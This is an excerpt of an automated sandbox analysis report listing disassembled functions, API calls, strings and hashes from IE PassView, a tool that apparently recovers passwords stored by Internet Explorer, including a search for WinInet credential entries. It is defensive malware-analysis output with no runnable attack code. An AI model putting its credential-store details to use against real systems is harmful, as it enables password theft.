                                          • Part of subcall function 00405C7E: ReadFile.KERNEL32(00000000,00000000,00402A58,00000000,00000000,00000001,9+@,00402A58,00000000,00000000), ref: 00405C95
                                        • CloseHandle.KERNEL32(00000000), ref: 00403AE3
                                        • memset.MSVCRT ref: 00403B02
                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000027), ref: 00403B14
                                          • Part of subcall function 0040387E: memcpy.MSVCRT(?,?,00000014,?,00000040,?,?,00000014,?,?,00000040,?,?,00000014,?,?), ref: 004038FF
                                          • Part of subcall function 0040387E: memcpy.MSVCRT(00403B3A,?,00000014,?,00000040,?,?,00000014,?,?,00000000,?,?,?,?,00403B3A), ref: 00403913
                                        • memset.MSVCRT ref: 00403B64
                                        • memset.MSVCRT ref: 00403B78
                                        • memcpy.MSVCRT(?,?,00000300,?,?,?,?,?,?), ref: 00403BA4
                                        • CloseHandle.KERNEL32(00000000), ref: 00403C38
                                        • GetLastError.KERNEL32(000000D0,?,00000000), ref: 00403C4D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpymemset$File$CloseHandle$CreateErrorLastReadSize
                                        • String ID:
                                        • API String ID: 3649111710-0
                                        • Opcode ID: 1cfd8bb843ecab2d6b68f0d864492ae9e3b97d52eccb6623384a9db00f67d67f
                                        • Instruction ID: 2c401ac52e737863d5db37530eab4728646a9ac02891eb25720bab3b67295176
                                        • Opcode Fuzzy Hash: 1cfd8bb843ecab2d6b68f0d864492ae9e3b97d52eccb6623384a9db00f67d67f
                                        • Instruction Fuzzy Hash: 3B5160B280011DAFDB11EFA4CC40EEE7BBDBB05305F0045BAE659B6181D7749B498BA5
                                        Function 00409AB3 Relevance: 15.1, APIs: 10, Instructions: 109windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409B00
                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409B35
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00409B51
                                        • LoadImageA.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00409B64
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00409B70
                                        • LoadImageA.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00409B83
                                        • GetSysColor.USER32(0000000F), ref: 00409B97
                                        • DeleteObject.GDI32(?), ref: 00409BCB
                                        • DeleteObject.GDI32(00000000), ref: 00409BCE
                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409BEC
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObject$Color
                                        • String ID:
                                        • API String ID: 3376742181-0
                                        • Opcode ID: 67b3fc5b3893174d1452885769811962b82f4d2bc43bed66222c9b5c4566237a
                                        • Instruction ID: 8d2c33ce65e6e93bbc9177c73148a2639eedd03895a0f911b98c468d623f8299
                                        • Opcode Fuzzy Hash: 67b3fc5b3893174d1452885769811962b82f4d2bc43bed66222c9b5c4566237a
                                        • Instruction Fuzzy Hash: F5312F71680304BFF6315B719D5BFDBB7A9EB48B00F100829F3997A1D1CAF278509A29
                                        Function 00401ABC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$strlen
                                        • String ID:
                                        • API String ID: 667451143-3916222277
                                        • Opcode ID: 25729e0cbf5ad53b8184dd575ad71ef6ef6561c60da3ae3b3689f997bb90a737
                                        • Instruction ID: eecc0934a3517d3ddcdb0937f2aecce29c8d7b695a5b4c66c4de19851d668ad5
                                        • Opcode Fuzzy Hash: 25729e0cbf5ad53b8184dd575ad71ef6ef6561c60da3ae3b3689f997bb90a737
                                        • Instruction Fuzzy Hash: 5D61573080C3459BDB249F25958446BBBF0FB85319F505D7FF4D6A22A1D739E84A8B0B
                                        Function 00407520 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                        • _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 004079B7: _itoa.MSVCRT ref: 004079D8
                                        • strlen.MSVCRT ref: 004075BB
                                        • GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        • LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                        • memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00008000,0040752E,004027DA,IE PassView), ref: 004074C6
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,0040752E,004027DA,IE PassView), ref: 004074E4
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407502
                                          • Part of subcall function 0040749E: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407512
                                        Strings
                                        • strings, xrefs: 00407593
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00407534
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itoa_mbscpymemcpystrlen
                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                        • API String ID: 2720128018-4125592482
                                        • Opcode ID: 2aa69879c5b011a083883b1db7165153c19e66f696278c2f2b28a7a3b07e28df
                                        • Instruction ID: fb2b10d7110c983e17de72fb39963645640201e5a887eeac91649e02a4ff43f4
                                        • Opcode Fuzzy Hash: 2aa69879c5b011a083883b1db7165153c19e66f696278c2f2b28a7a3b07e28df
                                        • Instruction Fuzzy Hash: 0B31B170914502ABD718CF68EF40EB13375F744348B10853EE852E72A2DBB9B821CB1D
                                        Function 00402173 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcsstr.MSVCRT ref: 00402196
                                        • wcsstr.MSVCRT ref: 004021AC
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004021EA
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402200
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402216
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040222B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$wcsstr
                                        • String ID: Microsoft_WinInet_$microsoft_wininet_
                                        • API String ID: 1878082614-2466264047
                                        • Opcode ID: 41231355ded2f497d01e705dfffcba8f40f154eeb1d2e485cd79e378f1fdc991
                                        • Instruction ID: 221f4b76ed72acdf7a56df693a9159ee713d33e5712e317dd6bba9da51bfd115
                                        • Opcode Fuzzy Hash: 41231355ded2f497d01e705dfffcba8f40f154eeb1d2e485cd79e378f1fdc991
                                        • Instruction Fuzzy Hash: 5C3146B6904118BFDB10DF99DCC5E9A77FCEB08364F1046AAB518F32D1D634AE408B64
                                        Function 00406914 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,;k@,00406AA3,?,?,;k@,?), ref: 00406934
                                          • Part of subcall function 00405CBC: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00406955,00000000,00000000,?,00000020,?,;k@,00406AA3,?,?,;k@), ref: 00405CC9
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406964
                                          • Part of subcall function 00406883: _memicmp.MSVCRT ref: 0040689D
                                          • Part of subcall function 00406883: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,;k@,?), ref: 004068B4
                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?), ref: 004069A7
                                        • strchr.MSVCRT ref: 004069CC
                                        • strchr.MSVCRT ref: 004069DD
                                        • _strlwr.MSVCRT ref: 004069EB
                                        • CloseHandle.KERNEL32(00000000), ref: 00406A1D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwr
                                        • String ID: ;k@
                                        • API String ID: 4244813814-665460895
                                        • Opcode ID: 3410370ad32c9d4de045059b5ad17b520df0b79d9fba2ef42f2fb680907535ef
                                        • Instruction ID: 0c70c8e6fbfe2c3a98432151b0775178d8653de44996378fb7d39e0ef779b4ec
                                        • Opcode Fuzzy Hash: 3410370ad32c9d4de045059b5ad17b520df0b79d9fba2ef42f2fb680907535ef
                                        • Instruction Fuzzy Hash: 0C31C7B1900118BFEB11EB95DC85AEE77BCEB05354F10807AF509F61C1D6389E548B69
                                        Function 00403F00 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00403F1F
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403F31
                                        • FreeLibrary.KERNEL32(00000000), ref: 00403F45
                                        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403F70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 2780580303-317687271
                                        • Opcode ID: 20fedd965ce86ee55ee3df6d6bbd08f0b6f3b31df7e532facff727d16d68ce21
                                        • Instruction ID: e6b3c2a68b509e593394b2d7662e1df3b50a3b5230e54d80e03e1d0a70b7e3ce
                                        • Opcode Fuzzy Hash: 20fedd965ce86ee55ee3df6d6bbd08f0b6f3b31df7e532facff727d16d68ce21
                                        • Instruction Fuzzy Hash: 8E01D6B1B542126BE7116FB69C49B6B7EACDB40746B004835F206F11C0DAB8DA05836D
                                        Function 004053F1 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00405416
                                        • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00405434
                                        • strlen.MSVCRT ref: 00405441
                                        • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00405451
                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040545B
                                        • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 0040546B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2881943006-572158859
                                        • Opcode ID: f721cc2d38dd59c01ce3eeb84e35142f2e787372eaa94605a12a8c02df4ffc6b
                                        • Instruction ID: 780582968d839c517e208e6dc7c127c2c37749bd79845ccb932b079bb69e2106
                                        • Opcode Fuzzy Hash: f721cc2d38dd59c01ce3eeb84e35142f2e787372eaa94605a12a8c02df4ffc6b
                                        • Instruction Fuzzy Hash: 52012B31504124BBE7242B62EC4AFDF7B2CDF04796F20843AF501B11D0DA796E50DAAC
                                        Function 004083BC Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 163COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081B7
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081C5
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081D6
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081ED
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081F6
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004083FD
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00408419
                                        • memcpy.MSVCRT(?,00411890,00000014), ref: 00408441
                                        • memcpy.MSVCRT(?,0041187C,00000010,?,00411890,00000014), ref: 0040845E
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004084E7
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 004084F1
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408529
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadString_mbscpystrlen
                                        • String ID: $$d
                                        • API String ID: 388234355-2066904009
                                        • Opcode ID: 2fce070b17f5a660c87dd23a172e0407e34b37c71a1e881ab68f4cc6ffd329e7
                                        • Instruction ID: dc56f8c129f481b0dd62ad421b394fb76c497c747426203c51168f4f8d00e949
                                        • Opcode Fuzzy Hash: 2fce070b17f5a660c87dd23a172e0407e34b37c71a1e881ab68f4cc6ffd329e7
                                        • Instruction Fuzzy Hash: 13518AB1A01704AFD724DF29C981B9ABBF4BF48314F10852EE59ADB391EB74E940CB44
                                        Function 0040D0C2 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,004091CC,?,?), ref: 0040D0F2
                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,004091CC,?,?), ref: 0040D118
                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,004091CC,?,?), ref: 0040D130
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: b53453093a91a2bd40d54fb5dcbadfb278f82bfd0d1c808de773c38b7fa42392
                                        • Instruction ID: 8d1a721b06f3ef9d69305db24848b834247efd1fec95164425edd42bfaaf8daa
                                        • Opcode Fuzzy Hash: b53453093a91a2bd40d54fb5dcbadfb278f82bfd0d1c808de773c38b7fa42392
                                        • Instruction Fuzzy Hash: DF01A2F2E8429475DB3110C61C06FB71A555BB7B24E75003BF9C9386C6A8BE088F91AF
                                        Function 00402A08 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405476: CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        • GetFileSize.KERNEL32(00000000,00000000,00000001,00000000,?,00402B39), ref: 00402A2C
                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,00402B39), ref: 00402A46
                                          • Part of subcall function 00405C7E: ReadFile.KERNEL32(00000000,00000000,00402A58,00000000,00000000,00000001,9+@,00402A58,00000000,00000000), ref: 00405C95
                                        • memcmp.MSVCRT(00000000,?,00000005,?,?,?,?,00402B39), ref: 00402A7A
                                        • memcmp.MSVCRT(0000000C,00000001,00000005,?,?,?,?,?,?,?,00402B39), ref: 00402A97
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,00402B39), ref: 00402ABD
                                        • CloseHandle.KERNEL32(00000000,?,00402B39), ref: 00402AC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: File$memcmp$??2@??3@CloseCreateHandleReadSize
                                        • String ID: 9+@
                                        • API String ID: 7797768-3562519540
                                        • Opcode ID: 2b7e516e48c429a51e6f156abf3eed591b1d8f4c21f64f567d49faeb7356c2f7
                                        • Instruction ID: d632cf90474aa45c018bec6463a2574c5a954da09c684a606b26d43efe75a2a7
                                        • Opcode Fuzzy Hash: 2b7e516e48c429a51e6f156abf3eed591b1d8f4c21f64f567d49faeb7356c2f7
                                        • Instruction Fuzzy Hash: DD21D871900208BADB109B75DC49B9F7BAC9F10318F14817AFC05F62C2E7749A48CAA5
                                        Function 00407C19 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407C3F
                                        • GetDlgCtrlID.USER32(?), ref: 00407C4A
                                        • GetWindowTextA.USER32(?,?,00001000), ref: 00407C5D
                                        • memset.MSVCRT ref: 00407C83
                                        • GetClassNameA.USER32(?,?,000000FF), ref: 00407C96
                                        • _strcmpi.MSVCRT ref: 00407CA8
                                          • Part of subcall function 00407AF1: _itoa.MSVCRT ref: 00407B12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                        • String ID: sysdatetimepick32
                                        • API String ID: 3411445237-4169760276
                                        • Opcode ID: 70858a5686a83ca73d16e525b2de2590a93d48c2ec5b21909403165946aeb95a
                                        • Instruction ID: 17534c4f124164a7f414e19630819eabf2b16663dbddf6454363a62207f4d036
                                        • Opcode Fuzzy Hash: 70858a5686a83ca73d16e525b2de2590a93d48c2ec5b21909403165946aeb95a
                                        • Instruction Fuzzy Hash: E811CAB2C0811D6EEB15A755DC81DEA7BACEF14355F0400BBFA08F3151E674AE848B65
                                        Function 00405050 Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 004050F8
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040510B
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405120
